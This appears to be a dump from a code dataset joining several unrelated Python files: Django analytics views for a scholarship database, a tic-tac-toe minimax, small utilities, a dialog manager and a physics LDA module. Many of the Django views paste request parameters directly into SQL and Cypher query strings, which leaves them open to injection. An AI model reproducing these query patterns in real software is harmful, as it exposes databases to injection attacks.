return render(request, template_name=\"analytics/profile.html\",\n context={'author': author,\n 'abstracts': abstracts,\n 'profile': profile,\n 'degree': degrees.get(int(profile.degree), 'Other'),\n 'fields': fields,\n 'keywords': keywords})\n\n\ndef main_db(request):\n total_words = conn.execute('select count(*) from keywords').scalar()\n total_abstracts = conn.execute('select count(*) from abstracts').scalar()\n fields = []\n query = ('select count(*), name from research_fields inner join '\n 'field_has_abstract on field_has_abstract.field_id=research_fields.id group by name;')\n for field in conn.execute(query).fetchall():\n fields.append(field)\n\n fields = sorted(fields, key=lambda x: x[0], reverse=True)\n return render(request, template_name=\"analytics/main.html\",\n context={'total_words': total_words,\n 'total_abstracts': total_abstracts,\n 'fields': fields\n })\n\n\ndef show_field(request, field_name):\n query = 'MATCH (f:Field{name:\"%s\"})-[:IN]-(:Abstract)-[:AUTHORED]-(au:Author)-[:AFFILIATE]-(af:Affiliation{country:\"Thailand\"}) RETURN f,au,af' % field_name\n results = list(graph.run(query))\n authors = []\n if results:\n for res in results:\n authors.append((res['au'], res['af']))\n return render(request, template_name=\"analytics/field_author.html\",\n context={'authors': authors, 'field': field_name})\n\ndef show_profile_by_name(request):\n first_name = request.GET.get('firstname', '')\n last_name = request.GET.get('lastname', '')\n first_name = first_name.replace(\"'\", \"\\'\") if first_name else first_name\n last_name = last_name.replace(\"'\", \"\\'\") if last_name else last_name\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n if first_name and last_name:\n author = conn.execute(\"select * from authors where \"\n \"lower(first_name)=lower(%s) and lower(last_name)=lower(%s)\",\n (first_name, last_name)).fetchone()\n if author:\n if author.scholarship_info_id:\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n degree = degrees.get(profile.degree, '')\n else:\n profile = None\n degree = ''\n keywords = conn.execute(\"select word_en,count from keywords where author_scopus_id='%s'\"\n % author.scopus_id).fetchall()\n keywords = set([(kw.word_en,kw.count) for kw in keywords])\n keywords = sorted(keywords, key=lambda x: x[1], reverse=True)\n query = (\"select abstracts.id,abstracts.title_en \"\n \"from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author.id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n query = (\"select name, country, year from affil_history inner join affils \"\n \"on affils.id=affiliation_id where author_id=%s;\" % author.id)\n affiliations = set((tuple(af) for af in conn.execute(query).fetchall()))\n affiliations = sorted(affiliations, key=lambda x: x[2])\n\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={'author': author, 'abstracts': abstracts,\n 'fields': fields, 'affils': affiliations,\n 'keywords': keywords, 'profile': profile,\n 'degree': degree})\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={})\n\n\ndef show_abstract(request, abstract_id):\n if abstract_id:\n abstract = conn.execute(\"select * from abstracts where id=%s;\" % abstract_id).fetchone()\n if abstract:\n authors = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%s;\"\n % abstract_id).fetchall()\n keywords = conn.execute(\"select * from keywords inner join abstract_has_keywords \"\n \"on abstract_has_keywords.keyword_id=keywords.id inner join \"\n \"abstracts on abstract_has_keywords.abstract_id=abstracts.id \"\n \"where abstracts.id=%s\" % abstract_id).fetchall()\n keywords = set([kw.word_en for kw in keywords])\n print(keywords)\n return render(request, template_name='analytics/abstract.html',\n context={'authors': authors, 'abstract': abstract, 'keywords': keywords})\n return render(request, template_name='analytics/abstract.html',\n context={'authors': [], 'abstract': None})\n\n\ndef show_abstract_per_person(request):\n data = []\n for rec in conn.execute(\" select status, count(*) as c from scholarship_info group by status;\"):\n data.append(rec[1])\n return JsonResponse({'data': data})\n\ndef get_num_active_scholar_studs(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_abstract_fields(request):\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n data = []\n labels = []\n backgroundColors = []\n for f,n in conn.execute(sqlquery):\n data.append(n)\n labels.append(f)\n backgroundColors.append('rgb(100,116,164)')\n\n return JsonResponse({'data': data, 'labels': labels, 'backgroundColors': backgroundColors})\n\n\ndef get_researcher_by_field(request):\n inactive_counts = defaultdict(int)\n active_counts = defaultdict(int)\n\n all_researchers = defaultdict(dict)\n sqlquery = ('select authors.id,research_fields.abbr,count(research_fields.abbr) as num_papers from field_has_abstract inner join research_fields on field_has_abstract.field_id=research_fields.id '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=field_has_abstract.abstract_id '\n 'inner join authors on authors.id=abstract_has_author.author_id '\n 'inner join scholarship_info on scholarship_info.id=authors.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by authors.id,abbr '\n 'order by authors.id,num_papers desc;')\n for auth_id, field_abbr, num_papers in conn.execute(sqlquery):\n if auth_id not in all_researchers:\n all_researchers[auth_id] = field_abbr\n\n active_researchers = set()\n sqlquery = 'select author_id from active_scholar_students;'\n for row in conn.execute(sqlquery):\n active_researchers.add(row[0])\n\n\n for auth_id in all_researchers:\n if auth_id in active_researchers:\n active_counts[all_researchers[auth_id]] += 1\n else:\n inactive_counts[all_researchers[auth_id]] += 1\n\n actives = []\n inactives = []\n labels = []\n activecolors = []\n inactivecolors = []\n data = [(k,v) for k,v in active_counts.items()]\n sorted_fields = [k for k,v in sorted(data,key=lambda x: x[1], reverse=True)]\n for field in sorted_fields:\n actives.append(active_counts[field])\n inactives.append(inactive_counts[field])\n labels.append(field)\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n\n return JsonResponse({'actives': actives, 'inactives': inactives,\n 'labels': labels,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors})\n\n\ndef get_scholar_joined_tm_ratio(request):\n sqlquery = ('select count(*) as c from tm_researcher_profile;')\n total_tm = conn.execute(sqlquery).scalar()\n sqlquery = ('select count(*) as c from tm_researcher_profile '\n 'where scholarship_info_id is not NULL')\n total_scholar = conn.execute(sqlquery).scalar()\n return JsonResponse({'data': [total_scholar, total_tm],\n 'labels': ['scholarship', 'non-scholarship']})\n\n\ndef get_num_active_scholar_tm(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_activeness_scholar_tm(request):\n tm_actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on active_scholar_students.scholarship_info_id=scholarship_info.id '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=active_scholar_students.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n for affil, cnt in conn.execute(sqlquery):\n tm_actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n labels = []\n inactive_data = []\n active_data = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in totals.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n if k in tm_actives:\n inactive_data.append(totals[k]-tm_actives[k])\n active_data.append(tm_actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_tm_researchers_graph_data(request):\n sqlquery = ('select authors.id from authors '\n 'inner join scholarship_info on authors.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true')\n\n scholars = set()\n for row in conn.execute(sqlquery):\n scholars.add(row[0])\n\n\n sqlquery = ('select authors.id, abstracts.id from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'inner join authors on scholarship_info.id=authors.scholarship_info_id '\n 'inner join abstract_has_author on abstract_has_author.author_id=authors.id '\n 'inner join abstracts on abstract_has_author.abstract_id=abstracts.id '\n 'where scholarship_info.status=true '\n )\n\n tm_abstracts = set()\n tm_authors = set()\n for author_id, abstract_id in conn.execute(sqlquery):\n tm_abstracts.add(abstract_id)\n tm_authors.add(author_id)\n\n sqlquery = ('select authors.id,authors.first_name, authors.last_name,abstracts.id from abstracts '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=abstracts.id '\n 'inner join authors on abstract_has_author.author_id=authors.id;'\n )\n abstracts = {}\n for author_id, first_name, last_name, abstract_id in conn.execute(sqlquery):\n if abstract_id in tm_abstracts:\n if abstract_id in abstracts:\n abstracts[abstract_id].append((author_id, '{} {}'.format(first_name, last_name)))\n else:\n abstracts[abstract_id] = [(author_id, '{} {}'.format(first_name, last_name))]\n\n edges = {}\n nodes = {}\n n = 0\n for abstract_id, authors in abstracts.items():\n n += 1\n first_author_id = authors[0][0]\n if first_author_id not in nodes:\n nodes[first_author_id] = {'name': authors[0][1], 'papers': 1}\n else:\n nodes[first_author_id]['papers'] += 1\n if first_author_id not in edges:\n edges[first_author_id] = {}\n if len(authors) > 1:\n for author in authors[1:]:\n if author[0] not in nodes:\n nodes[author[0]] = {'name': author[1], 'papers': 1}\n else:\n nodes[author[0]]['papers'] += 1\n if author[0] in edges and edges[author[0]].get(first_author_id, None):\n continue\n else:\n edges[first_author_id][author[0]] = edges[first_author_id].get(author[0], 0) + 1\n\n nodes_data = []\n edges_data = []\n flt_nodes = set()\n for n in nodes:\n if nodes[n]['papers'] > 2:\n flt_nodes.add(n)\n if n in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': n,\n 'value': nodes[n]['papers'],\n 'label': nodes[n]['name'],\n 'color': color\n })\n for _from in list(flt_nodes):\n for _to in edges.get(_from, []):\n if edges[_from][_to] >= 1:\n edges_data.append({\n 'from': _from,\n 'to': _to,\n 'value': edges[_from][_to],\n 'title': '{} publications'.format(edges[_from][_to])\n })\n if _to not in flt_nodes:\n if _to in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': _to,\n 'value': nodes[_to]['papers'],\n 'label': nodes[_to]['name'],\n 'color': color\n })\n flt_nodes.add(_to)\n\n\n return JsonResponse({'edges': edges_data, 'nodes': nodes_data})\n\n\ndef show_scholar_dashboard(request):\n return render(request, template_name=\"analytics/scholar-dashboard.html\",\n context={'board': 'scholar'})\n\ndef show_gjb_dashboard(request):\n return render(request, template_name=\"analytics/gjb-dashboard.html\",\n context={'board': 'gjb'})\n\ndef show_tm_dashboard(request):\n return render(request, template_name=\"analytics/tm-dashboard.html\",\n context={'board': 'tm'})\n\ndef show_network_dashboard(request):\n return render(request, template_name=\"analytics/network-dashboard.html\",\n context={'board': 'network'})\n\ndef count_gjb_by_status(request):\n data = []\n sqlquery = (\"select count(*), finished from gjb_researcher_profile inner join gjb_theses on gjb_researcher_profile.id=gjb_theses.researcher_id group by finished\")\n for rec in conn.execute(sqlquery):\n data.append(rec[0])\n return JsonResponse({'data': data})\n\ndef count_gjb_by_status_affil(request):\n data = []\n sqlquery = (\"select count(*),finished, university_th from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"group by finished,university_th order by university_th\")\n labels = []\n unfinished_data = []\n finished_data = []\n finished_colors = []\n unfinished_colors = []\n finished_dict = defaultdict(int)\n unfinished_dict = defaultdict(int)\n for cnt, finished, affil in conn.execute(sqlquery):\n if finished:\n finished_dict[affil] += cnt\n else:\n unfinished_dict[affil] += cnt\n\n sorted_finished_data = sorted([(k,v) for k,v in finished_dict.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_finished_data:\n unfinished_data.append(unfinished_dict[k])\n finished_data.append(finished_dict[k])\n finished_colors.append('rgb(199,0,57)')\n unfinished_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': finished_data,\n 'inactives': unfinished_data,\n 'activecolors': finished_colors,\n 'inactivecolors': unfinished_colors,\n 'labels': labels})\n\ndef count_active_gjb_researcher(request):\n active_university_dict = defaultdict(int)\n inactive_university_dict = defaultdict(int)\n total_university_dict = defaultdict(int)\n for res in conn.execute(\n 'select * from gjb_researcher_profile as gp inner join gjb_theses on gjb_theses.researcher_id=gp.id where gjb_theses.finished=TRUE'):\n uni = res[11]\n total_university_dict[uni] += 1\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = \"select * from recent_pubs where lower(first_name)='%s' and lower(last_name)='%s'\" % (\n first_name, last_name)\n total_pubs = list(pubconn.execute(sqlquery))\n if len(total_pubs) > 0:\n active_university_dict[uni] += 1\n for uni in total_university_dict:\n inactive_university_dict[uni] = total_university_dict[uni] - active_university_dict[uni]\n\n sorted_active_data = sorted([(k,v) for k,v in active_university_dict.items()],\n key=lambda x: x[1], reverse=True)\n active_data = []\n inactive_data = []\n active_colors = []\n inactive_colors = []\n labels = []\n for k,v in sorted_active_data:\n active_data.append(inactive_university_dict[k])\n inactive_data.append(active_university_dict[k])\n active_colors.append('rgb(199,0,57)')\n inactive_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': active_colors,\n 'inactivecolors': inactive_colors,\n 'labels': labels})\n\ndef count_gjb_pub_by_field(request):\n fields = defaultdict(int)\n sc_fields = defaultdict(int)\n for res in conn.execute(\"select * from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"where gjb_theses.finished=TRUE\"):\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = (\"select * from recent_pubs where lower(first_name)='%s' \"\n \"and lower(last_name)='%s'\") % (first_name, last_name)\n for rec in pubconn.execute(sqlquery):\n field = rec[3]\n fields[field] += 1\n\n\n gjb_counts = []\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n sc_counts = []\n labels = []\n for f,n in conn.execute(sqlquery):\n sc_fields[f] += n\n\n for field in fields:\n labels.append(field)\n gjb_counts.append(fields[field])\n sc_counts.append(sc_fields[field])\n\n\n return JsonResponse({'gjb_counts': gjb_counts, 'labels': labels, 'sc_counts': sc_counts})\n\n","sub_path":"web/code/tm/analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"142980084","text":"import random\n\nBOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']\nwin = [['a1', 'a2', 'a3'], ['b1', 'b2', 'b3'], ['c1', 'c2', 'c3'], ['a1', 'b1', 'c1'], ['a2', 'b2', 'c2'], ['a3', 'b3', 'c3'], ['a1', 'b2', 'c3'], ['a3', 'b2', 'c1']]\n\ndef minimax(ox, oz, depth, level, player):\n if depth == 0: \n for pos in win:\n ok = 1\n for i in pos:\n if not (i in ox):\n ok = 0\n break \n if ok == 1: \n return 1 if player else -1\n ok = 1\n for i in pos:\n if not(i in oz):\n ok = 0\n break\n if ok == 1:\n return 1 if player == False else -1\n return 0\n alfa = -1000\n available = list( set(BOARD) - set(ox) - set(oz) )\n for child in available:\n if level == False:\n oz_=oz[:]\n oz_.append(child)\n alfa = max(alfa, -minimax(ox, oz_, depth-1, not(level), player))\n else:\n ox_=ox[:]\n ox_.append(child)\n alfa = max(alfa, -minimax(ox_, oz, depth-1, not(level), player))\n return alfa;\n \n \n\ndef play_turn(\n player_role,\n owned_by_x,\n owned_by_zero\n ):\n\n #print player_role, owned_by_x, owned_by_zero\n available_squares = list( set(BOARD) - set(owned_by_x) - set(owned_by_zero) )\n best1=-1; best2=1;\n el = BOARD[0]\n for i in available_squares:\n if player_role == 'x':\n x = owned_by_x[:]\n x.append(i)\n mini = minimax(owned_by_x,owned_by_zero,len(available_squares),True,True)\n if mini > best1:\n best1 = mini\n el = i\n else: \n z = owned_by_zero[:]\n z.append(i)\n mini = minimax(owned_by_x,owned_by_zero,len(available_squares),True,False)\n if mini < best2:\n best2 = mini\n el = i\n return el\n #return random.choice(available_squares)\n\n","sub_path":"tictactoe/adibranescu/tictactoe_play_turn.py","file_name":"tictactoe_play_turn.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"206761772","text":"import qrcode\n\nqr = qrcode.QRCode(\n version=5,\n box_size=5,\n border=2\n)\ndata = 'www.billavamsikrishna.co'\nqr.add_data(data)\nqr.make(fit=True)\nimg = qr.make_image(fill_color='green',back_color='white')\nimg.save('vamsi.png')\n","sub_path":"Making a py qr code/qrcodevamsi.py","file_name":"qrcodevamsi.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24499598","text":"n_max = 150 #Numero maximo de resistores na associacao\ncnt = 0\nprint (\"======= Calculo de associacao de resistores =========\")\nvalue = (float)(input(\"valor do resistor fixo: \"))\nobj_value = (float)(input(\"Valor do resistor desejado: \"))\nobj_err = (float)(input(\"Maximo erro da resistencia: \"))\n\nprint (\"**********************************************************************\")\nprint(\"\")\nfor p in range(1,n_max):\n for s2 in range(1,n_max):\n for s1 in range(1,n_max):\n n=s1*s2*p\n if(n <= n_max):\n res = ((value * s1)/p)*s2\n error = abs(obj_value - res) \n if error < obj_err:\n print (\"Valor: %.3f, Erro = %.3f, N = %i, s1 = %i, s2 = %i,0 p = %i\" %(res,error,n,s1,s2,p))\n cnt = cnt + 1\nprint(\"\")\nprint (\"**********************************************************************\")\nprint (\"Combinacoes possiveis: %i\" %(cnt))\nprint(\"\")\nprint(\"\")\n","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262914079","text":"from .dialog_manager_super import DialogManagerBase\n\n\nclass TelegramDialogManager(DialogManagerBase):\n\n def initialize_episode(self):\n \"\"\" Refresh state for new dialog \"\"\"\n\n super().initialize_episode()\n self.user.initialize_episode()\n self.agent.initialize_episode()\n\n def next_turn(self, message):\n \"\"\" This function initiates each subsequent exchange between agent and user (agent first) \"\"\"\n\n ########################################################################\n # CALL USER TO TAKE HER TURN\n ########################################################################\n\n user_action = self.user.next(message)\n self.state_tracker.update(user_action=user_action)\n\n ########################################################################\n # CALL AGENT TO TAKE HER TURN\n ########################################################################\n\n agent_state = self.state_tracker.get_state_for_agent()\n agent_action = self.agent.state_to_action(agent_state)\n\n ########################################################################\n # Register AGENT action with the state_tracker\n ########################################################################\n self.state_tracker.update(agent_action=agent_action)\n\n self.agent.add_nl_to_action(agent_action)\n agent_ans = agent_action['act_slot_response']['nl']\n\n if user_action['diaact'] == \"thanks\":\n agent_ans = 'Thank you, good bye!'\n self.episode_over = True\n\n return self.episode_over, agent_ans","sub_path":"src/deep_dialog/dialog_system/dialog_manager_telegram.py","file_name":"dialog_manager_telegram.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"36054575","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# author:lwz\n\nstr = \"loveleetcode\"\n\nclass Solution:\n def firstUniqChar(self, s):\n obj, min = {}, len(s)\n for i, j in enumerate(s):\n if j in obj:\n obj[j].append(i)\n else:\n obj.setdefault(j, [i])\n for i in obj:\n if len(obj[i]) == 1:\n min = obj[i][0] if obj[i][0] < min else min\n if min == len(s):\n return -1\n return min\n\nsolution = Solution()\nmin = solution.firstUniqChar(str)\nprint(min)","sub_path":"Week 08/id_524/LeetCode_387_524.py","file_name":"LeetCode_387_524.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623726666","text":"\"\"\"Uses the [adiabatic] local density approximation ([A]LDA) to calculate the [time-dependent] \nelectron density [and current] for a system of N electrons.\n\nComputes approximations to V_KS, V_H, V_xc using the LDA self-consistently. For ground state \ncalculations the code outputs the LDA orbitals and energies of the system, the ground-state \ncharge density and Kohn-Sham potential. For time dependent calculations the code also outputs \nthe time-dependent charge and current densities and the time-dependent Kohn-Sham potential.\n\nNote: Uses the LDAs developed in [Entwistle2018]_ from finite slab systems and the HEG, \nin one dimension.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport copy\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.linalg as spla\nimport scipy.sparse.linalg as spsla\n\nfrom . import LDA_parameters\nfrom . import RE_cython\nfrom . import results as rs\nfrom . import mix\nfrom . import minimize\n\n\ndef groundstate(pm, H):\n r\"\"\"Calculates the ground-state of the system for a given potential.\n\n .. math:: \n \n \\hat{H} \\phi_{j} = \\varepsilon_{j} \\phi_{j}\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n \"\"\"\n # Solve the Kohn-Sham equations\n eigenvalues, orbitals = spla.eig_banded(H, lower=True)\n \n # Normalise the orbitals\n orbitals /= np.sqrt(pm.space.delta)\n\n # Calculate the electron density\n density = electron_density(pm, orbitals)\n\n return density, orbitals, eigenvalues\n\n\ndef electron_density(pm, orbitals):\n r\"\"\"Calculates the electron density from the set of orbitals.\n\n .. math:: \n\n n(x) = \\sum_{j=1}^{N}|\\phi_{j}(x)|^{2}\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n returns\n -------\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n \"\"\"\n density = np.sum(np.absolute(orbitals[:,:pm.sys.NE])**2, axis=1)\n\n return density\n\n\ndef ks_potential(pm, density, perturbation=False):\n r\"\"\"Calculates the Kohn-Sham potential from the electron density.\n\n .. math::\n\n V_{\\mathrm{KS}} = V_{\\mathrm{ext}} + V_{\\mathrm{H}} + V_{\\mathrm{xc}}\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n \"\"\"\n v_ks = pm.space.v_ext + hartree_potential(pm, density) + xc_potential(pm, density)\n if perturbation:\n v_ks += pm.space.v_pert\n\n return v_ks\n\n\ndef banded_to_full(pm, H):\n r\"\"\"Converts the Hamiltonian matrix in band form to the full matrix.\n\n parameters\n ----------\n pm : object\n Parameters object\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n\n returns\n -------\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n \"\"\"\n # Stencil used\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Add the band elements to the full matrix\n H_full = np.zeros((pm.space.npt,pm.space.npt), dtype=np.float)\n for ioff in range(nbnd):\n d = np.arange(pm.space.npt-ioff)\n H_full[d,d+ioff] = H[ioff,d]\n H_full[d+ioff,d] = H[ioff,d]\n\n return H_full\n\n\ndef kinetic(pm):\n r\"\"\"Stores the band elements of the kinetic energy matrix in lower form. The kinetic energy matrix \n is constructed using a three-point, five-point or seven-point stencil. This yields an NxN band \n matrix (where N is the number of grid points). For example with N=6 and a three-point stencil:\n \n .. math::\n\n K = -\\frac{1}{2} \\frac{d^2}{dx^2}= \n -\\frac{1}{2} \\begin{pmatrix} \n -2 & 1 & 0 & 0 & 0 & 0 \\\\ \n 1 & -2 & 1 & 0 & 0 & 0 \\\\ \n 0 & 1 & -2 & 1 & 0 & 0 \\\\ \n 0 & 0 & 1 & -2 & 1 & 0 \\\\ \n 0 & 0 & 0 & 1 & -2 & 1 \\\\ \n 0 & 0 & 0 & 0 & 1 & -2 \n \\end{pmatrix} \n \\frac{1}{\\delta x^2} \n = [\\frac{1}{\\delta x^2},-\\frac{1}{2 \\delta x^2}] \n\n parameters\n ----------\n pm : object\n Parameters object\n\n returns array_like\n 2D array containing the band elements of the kinetic energy matrix, indexed as \n K[band,space_index]\n \"\"\"\n # Stencil to use\n sd = pm.space.second_derivative_band\n nbnd = len(sd)\n\n # Band elements\n K = np.zeros((nbnd, pm.space.npt), dtype=np.float)\n for i in range(nbnd):\n K[i,:] = -0.5 * sd[i]\n\n return K\n\n\ndef hamiltonian(pm, v_ks=None, orbitals=None, perturbation=False):\n r\"\"\"Constructs the Hamiltonian matrix in band form for a given Kohn-Sham potential.\n\n .. math::\n\n \\hat{H} = \\hat{K} + \\hat{V}_{\\mathrm{KS}}\n\n parameters\n ----------\n pm : object\n Parameters object\n v_ks : array_like\n 1D array of the Kohn-Sham potential, indexed as v_ks[space_index]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n perturbation: bool\n - True: Perturbed external potential\n - False: Unperturbed external potential\n\n returns\n -------\n H : array_like\n 2D array of the Hamiltonian matrix in band form, indexed as H[band,space_index]\n \"\"\"\n # Kinetic energy matrix\n H = kinetic(pm)\n\n # Calculate the Kohn-Sham potential from the orbitals\n if orbitals is not None:\n density = electron_density(pm, orbitals)\n if perturbation:\n v_ks = ks_potential(pm, density, perturbation=True) \n else:\n v_ks = ks_potential(pm, density)\n\n # Add the Kohn-Sham potential to the Hamiltonian\n H[0,:] += v_ks\n\n return H\n\n\ndef hartree_potential(pm, density):\n r\"\"\"Calculates the Hartree potential for a given electron density.\n\n .. math::\n\n V_{\\mathrm{H}}(x) = \\int U(x,x') n(x') dx'\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n\n returns array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n \"\"\"\n v_h = np.dot(pm.space.v_int,density)*pm.space.delta\n\n return v_h\n\n\ndef hartree_energy(pm, v_h, density):\n r\"\"\"Calculates the Hartree energy of the ground-state system.\n\n .. math::\n\n E_{\\mathrm{H}}[n] = \\frac{1}{2} \\int \\int U(x,x') n(x) n(x') dx dx'\n = \\frac{1}{2} \\int V_{\\mathrm{H}}(x) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n v_h : array_like\n 1D array of the ground-state Hartree potential, indexed as v_h[space_index]\n density : 